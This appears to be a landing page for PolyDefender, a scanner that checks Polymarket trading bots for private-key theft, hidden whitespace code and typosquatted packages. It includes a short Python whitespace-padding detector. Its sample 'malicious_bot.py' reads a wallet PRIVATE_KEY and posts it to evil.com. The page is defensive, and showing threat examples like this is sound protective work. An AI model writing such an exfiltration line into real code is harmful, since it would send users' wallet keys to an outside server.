PolyDefender

FREE AI security scanner that detects wallet drains, API key theft, and malicious code in Polymarket Bots

Free to use
<10s scan
No data stored
1,247+ Scans Run
$485K+ Stolen Recently
1,200+ Threat Patterns
12 Attack Types
<10s Scan Time

Recent Scan Activity

Live community scans

Live Feed
8 recent
95 | Safe | Clean Polymarket CLOB trading bot
8 | Malicious | Trust412 pattern detected — private key exfiltration via Telegram
100 | Safe | Polymarket order-utils wrapper — no threats found
62 | Suspicious | Unusual base64 strings and external HTTP POST requests
22 | Dangerous | Clipboard hijacker replacing wallet addresses with attacker-controlled address
91 | Safe | Standard Polymarket copy-trading bot using official py-clob-client
3 | Malicious | GitVenom hidden code after 2000+ tabs — stealer exfiltrating to Discord webhook
88 | Safe | Next.js dashboard for Polymarket analytics — clean
Powerful Features

Complete Security Toolkit

Scan Polymarket bots for wallet drains and credential theft before you run them. Free.

GitHub Repository Scan

Paste any GitHub URL to scan entire repositories. Analyzes all Python, JavaScript, and TypeScript files for threats.

Paste & Scan Code

Paste code directly into the scanner for instant analysis. Supports Python, JavaScript, and TypeScript.

AI-Powered Analysis

Opus 4.5 powered deep analysis detects novel attack patterns beyond simple regex matching.

Scan History

Access previous scans instantly

Share Results

Share reports via link or download

Private Key Detection

Catches credential theft attempts

Malicious Packages

Detects typosquatted libraries

Real Threats

Active Polymarket Attacks

These attacks have stolen hundreds of thousands from traders running unverified code.

Trust412 Attack
Severity: critical | Dec 2025
Malicious validate_mcp function stealing private keys via hidden dependency
Loss: Active

GitVenom
Severity: critical | 2+ Years
Malware hidden after 2000+ whitespace characters in Python files
Loss: $485K+

Typosquatting
Severity: high | Ongoing
Fake packages mimicking official Polymarket libraries
Loss: Ongoing
Quick Start

How to Use the Scanner

Scan any code in 3 simple steps

1. Paste Code or URL

Copy the bot code or paste a GitHub repository URL into the scanner input.

2. Run the Scan

Click "Scan Code" or "Scan Repository" and let our AI analyze every line for threats.

3. Review & Download

Review the detailed findings, severity ratings, and download the full PDF report.

Detection Engine

What We Detect

PolyDefender scans for 1,200+ threat patterns across 12 attack categories.

Private key exfiltration
Credential theft
Hidden whitespace code
Base64/Hex obfuscation
Malicious dependencies
Clipboard hijacking
Trust412 patterns
GitVenom signatures
Typosquatted packages
Environment theft
Network exfiltration
MCP exploits
malicious_bot.py

import os
import requests

# Reads the wallet private key from the environment
key = os.environ["PRIVATE_KEY"]
# Sends the key to an external server
requests.post("https://evil.com", data=key)

# CRITICAL: Credential Exfiltration
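
A minimal check for the "Hidden whitespace code" category listed above, as an added example (it is not PolyDefender's own detection code). The 200-character threshold, the function name and the sample input are assumptions made for illustration.

```python
import re

# Assumed threshold for this sketch: the page cites payloads placed after
# 2000+ whitespace characters, so any run this long inside a line is abnormal.
MIN_PAD = 200
PAD_RUN = re.compile(r"[ \t]{%d,}" % MIN_PAD)


def find_hidden_code(source, preview=60):
    """Return one finding per line that has text after a long whitespace run.

    Trailing whitespace alone is not reported; only padding that is followed
    by more text, which an editor without word wrap would show off-screen.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for run in PAD_RUN.finditer(line):
            hidden = line[run.end():].strip()
            if not hidden:
                continue  # padding runs to end of line: untidy, not hidden code
            findings.append({
                "line": line_no,
                "column": run.end() + 1,  # 1-based column where hidden text starts
                "padding": run.end() - run.start(),
                "visible": line[:run.start()].strip(),
                "hidden": hidden[:preview],
            })
            break  # one finding per line is enough to fail the file
    return findings


# Constructed sample: a harmless statement pushed 2100 tabs to the right of
# an ordinary-looking line, plus a line that only has long trailing padding.
SAMPLE = (
    "import os\n"
    "balance = 0;" + "\t" * 2100 + "print('hidden statement')\n"
    "price = 1" + " " * 300 + "\n"
)

if __name__ == "__main__":
    for f in find_hidden_code(SAMPLE):
        print("line %(line)d col %(column)d: %(padding)d pad chars, then %(hidden)r" % f)
```

Run it over each file before reading the code in an editor, since the flagged column shows where to scroll to see what the visible part of the line does not.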

Trusted Security Scanner

Built specifically for the Polymarket trading community

Open Source Patterns: Community-verified
Privacy First: No code stored
Real-time Analysis: Instant results
Regular Updates: New threats daily

Protect Your Funds from Malicious Bot Code

Scan any code from GitHub, Telegram, or Discord in seconds.

FAQ

Frequently Asked Questions

Everything you need to know about PolyDefender

Yes! PolyDefender is 100% free to use with no account required. Simply paste your code or a GitHub URL and get instant security analysis. No credit card, no sign-up.

We currently support Python, JavaScript, and TypeScript — the most common languages used in Polymarket trading bots. This covers .py, .js, .ts, and .tsx files.

No. Your code is analyzed in real-time and never permanently stored on our servers. We prioritize your privacy — scan results are cached temporarily for sharing links but the source code itself is not retained.

PolyDefender uses a two-layer approach: first, pattern matching against 1,200+ known threat signatures (including Trust412, GitVenom, and typosquatting attacks). Then, AI-powered deep analysis detects novel and obfuscated threats that simple regex can't catch.

Yes! Paste any public GitHub repository URL and PolyDefender will automatically scan all supported files in the repo. It analyzes the entire codebase and produces a combined security report.

Do NOT run the code. Review each finding carefully — the report includes explanations of what each threat does, its severity level, and recommended remediation steps. When in doubt, avoid the code entirely.

Our threat database is updated regularly as new Polymarket-targeted attacks are discovered. This includes patterns from real attacks like Trust412, GitVenom, and emerging typosquatting campaigns.